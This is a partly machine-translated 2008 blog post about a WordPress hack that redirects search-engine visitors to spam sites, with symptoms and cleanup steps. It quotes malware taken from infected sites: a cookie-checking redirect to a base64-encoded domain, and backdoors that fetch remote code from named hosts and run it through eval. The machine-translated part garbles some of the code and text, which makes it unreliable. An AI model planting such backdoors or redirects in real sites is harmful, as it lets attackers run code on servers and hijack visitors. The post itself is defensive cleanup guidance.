WordPress文丐： 恢复并且固定Google和搜索引擎或者没有曲奇饼交通被改方向对Your-Needs.info、AnyResults.Net、Golden-Info.net和其他非法站点

黑客全力以赴乱砍，并且利用在网被主持的WordPress blogs，种植和注射恶意代码入WordPress代码和数据库为了改访客和命中方向从Google和其他搜寻引擎发送同样的消息到多个新闻组站点例如your-needs.info， anyresults.net， golden-info.net， keymachine.de， beliy.us， seogoogle.us，并且填装用的许多其他发送同样的消息到多个新闻组站点支付每点击CPC ads。 某一文丐看上去通过改全部方向瞄准更大的人群，不用WordPress曲奇饼。 不用被乱砍，这些交易假想到达在blog作为目的地。

搜索引擎改变方向文丐的症状

注意不是所有的症状也许一共发生。 文丐一个方法存在了也许有超过，对另外发现和可能的决议贡献。

• 通过所有点击从查寻引擎例如Google，雅虎， AOL， MSN，窗口居住查寻结果，包括blog名字，被改方向并且批转对黑客的站点例如your-needs.info， anyresults.net， golden-info.net， keymachine.de， beliy.us， seogoogle.us，与名单肯定增长。 观察者到达在黑客页与他或她在搜索引擎曾经搜寻的同一个搜索字符串。
• 点击链接对blog在RSS饲料读者例如Google读者能也是被改方向对黑客站点。
• 一个没有访客没有帐户在blog或者注册(因此不食用恶意代码查出的曲奇饼)，不会被改方向发送同样的消息到多个新闻组站点。
• 仅参观从搜索引擎被改方向，并且把戏设法无所事事大概很多bloggers、Web站点管理员和站点所有者或者至少延迟问题的侦查。
• 突然的巨大和剧烈的下落和在网跟踪仪统计，特别是交通丢失大数量访客交易并且呼叫看法与Google作为referrer，即使搜索引擎结果排列是原封的。
• 广告收入Massic下落从Google AdSense或其他ads网络或者会员委员会。
• 以下base64编码PHP代码在wpblog header.php文件也许出现：

  <？php \
$seref=array (“google”， “msn”， “活”， “AltaVista”， “要求”， “雅虎”， “AOL”， “cnn”， “天气”， “alexa”);
$ser=0; foreach ($seref作为$ref)，如果(strpos (strtolower ($_SERVER [’ HTTP_REFERER’])， $ref)! ==false) {$ser=” 1 ？; 断裂; }
如果($ser==” 1 ？ && sizeof ($_COOKIE) ==0) {倒栽跳水(”地点： http://” .base64_decode (” YW55cmVzdWx0cy5uZXQ=”)。”/”); 出口; } ？>

• 图象，实际上是一束恶意PHP代码，增加了到wp内容或上装目录。 例如， wp内容或uploads/2008/06/06/abcdefghijklmn.jpg或者它也许是在您的题材文件夹里面，即。 wp内容或题材或者经典之作或者图象或者xyz.jpg。 The name of the image may be in the format of xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Examples are the following codes:

  if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  eval(gzinflate(base64_decode(

• WordPress theme that is been activated and used can be injected with hacking code and affected too. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some reports that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages.

1. Backup the WordPress database.
2. Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table, and then edit the row named active_plugins. The row details all active plugins that has been activated. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Note down the path to the image file.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row.
5. Back to phpMyAdmin, at the wp_options table, find a row that contains the following string as option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away.

   If you don’t know how to perform the database cleanup detailed in steps above, here’s a video tutorial:

6. Go to wp_users table. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00, note down the user ID (ID field, a number). Delete the user.
7. Browse the wp_usermeta table. Locate all rows with user_id matches the ID of the deleted illegal user. There are normally three rows been associated to the invader user ID. Delete all the associated rows.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Check the header.php and index.php for any suspicious code. As mentioned above, look for something similar to the line below:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

   If found, delete and remove the code. Note that the malicious code will be several lines long in total.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original latest version from WordPress (of course, except few files such as wp-config.php and themes). If you’re upgrading, read the guide carefully.
11. Change your password.
12. If you have multiple users, change theirs password (or ask them to change the password) too.

IMPORTANT: This is a machine translated page which is provided "as is" without warranty. Machine translation may be difficult to understand. Please refer to original English article whenever possible.

Share and contribute or get technical support and help at My Digital Life Forums.

Related Articles

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin
• Technorati Incoming Links Plugin for WordPress
• A Glance At Google Merchant Search
• How to Avoid, Bypass or Escape Google Sandbox
• Drive More Traffic by Using Images
• Ask.com Search Engine Review by CNNMoney
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template
• Which Search Engine is the Best and Most Relevant?

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Weblogs. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.